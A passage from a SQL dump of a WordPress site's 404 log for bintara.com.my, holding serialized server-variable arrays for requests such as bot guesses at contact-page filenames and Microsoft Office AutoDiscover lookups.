InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/contact.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzomQflmQKZNUpCueiRgAAAM0\";s:12:\"REDIRECT_URL\";s:12:\"/contact.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"23949\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.asp\";s:10:\"SCRIPT_URL\";s:12:\"/contact.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzomQflmQKZNUpCueiRgAAAM0\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025826.8497\";s:12:\"REQUEST_TIME\";s:10:\"1571025826\";}}','notice','2019-10-14 04:03:50','2019-10-14 04:03:47',35025160,36824704,'https://bintara.com.my/contact.asp',1,0,'183.197.116.193'),(27996,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/contact.aspx\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/contact.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/contact.aspx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzn70j4KqzOPWDFBPVYgAAAgY\";s:12:\"REDIRECT_URL\";s:13:\"/contact.aspx\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"23931\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/contact.aspx\";s:10:\"SCRIPT_URL\";s:13:\"/contact.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzn70j4KqzOPWDFBPVYgAAAgY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025823.5064\";s:12:\"REQUEST_TIME\";s:10:\"1571025823\";}}','notice','2019-10-14 04:03:45','2019-10-14 04:03:44',35024248,36832104,'https://bintara.com.my/contact.aspx',1,0,'183.197.116.193'),(27995,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/contact.jsp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.jsp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/contact.jsp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPznO64dmMiXPBY9-n5KQAAAIE\";s:12:\"REDIRECT_URL\";s:12:\"/contact.jsp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"23916\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.jsp\";s:10:\"SCRIPT_URL\";s:12:\"/contact.jsp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPznO64dmMiXPBY9-n5KQAAAIE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025820.3047\";s:12:\"REQUEST_TIME\";s:10:\"1571025820\";}}','notice','2019-10-14 04:03:42','2019-10-14 04:03:40',35025160,36824704,'https://bintara.com.my/contact.jsp',1,0,'183.197.116.193'),(27994,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/contact.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaPzl2QflmQKZNUpCueiRAAAAMw\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/contact.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzl2QflmQKZNUpCueiRAAAAMw\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"23898\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.php\";s:10:\"SCRIPT_URL\";s:12:\"/contact.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzl2QflmQKZNUpCueiRAAAAMw\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025815.8006\";s:12:\"REQUEST_TIME\";s:10:\"1571025815\";}}','notice','2019-10-14 04:03:39','2019-10-14 04:03:36',35031600,36831320,'https://bintara.com.my/contact.php',1,0,'183.197.116.193'),(27993,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/contact.htm\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.htm\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/contact.htm\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzk@64dmMiXPBY9-n5KAAAAJQ\";s:12:\"REDIRECT_URL\";s:12:\"/contact.htm\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"23865\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/contact.htm\";s:10:\"SCRIPT_URL\";s:12:\"/contact.htm\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzk@64dmMiXPBY9-n5KAAAAJQ\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025811.8683\";s:12:\"REQUEST_TIME\";s:10:\"1571025811\";}}','notice','2019-10-14 04:03:35','2019-10-14 04:03:32',35023344,36827248,'https://bintara.com.my/contact.htm',1,0,'183.197.116.193'),(27992,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/contact.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/contact.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/contact.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzju64dmMiXPBY9-n5JwAAAIM\";s:12:\"REDIRECT_URL\";s:13:\"/contact.html\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"23843\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/contact.html\";s:10:\"SCRIPT_URL\";s:13:\"/contact.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzju64dmMiXPBY9-n5JwAAAIM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025806.6241\";s:12:\"REQUEST_TIME\";s:10:\"1571025806\";}}','notice','2019-10-14 04:03:31','2019-10-14 04:03:27',35415376,37220968,'https://bintara.com.my/contact.html',1,0,'183.197.116.193'),(27991,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=11\";s:15:\"HTTP_USER_AGENT\";s:138:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64 (Edition Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"91.236.74.16\";s:11:\"REMOTE_PORT\";s:5:\"52105\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPxYe64dmMiXPBY9-n4vwAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571025249.473\";s:12:\"REQUEST_TIME\";s:10:\"1571025249\";}}','notice','2019-10-14 03:54:13','2019-10-14 03:54:10',35419472,37227872,'https://bintara.com.my/?page_id=11',1,0,'91.236.74.16'),(27990,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2A55C7D6-59F4-4CBC-89F8-6901F0BCF1E2\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPegG6ehEAhDlnQjzWBqAAAAUc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.168.123\";s:11:\"REMOTE_PORT\";s:5:\"14822\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPegG6ehEAhDlnQjzWBqAAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571020416.9001\";s:12:\"REQUEST_TIME\";s:10:\"1571020416\";}}','notice','2019-10-14 02:33:40','2019-10-14 02:33:37',35739056,37533328,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.168.123'),(27989,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:3:\"5-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"iOS\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A799E99D-B15B-4DAE-B374-4AEE561FC78C\";s:21:\"HTTP_X_OFFICE_VERSION\";s:8:\"2.29.912\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"5-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPdhAcl7hU0V3byd4gBUQAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOT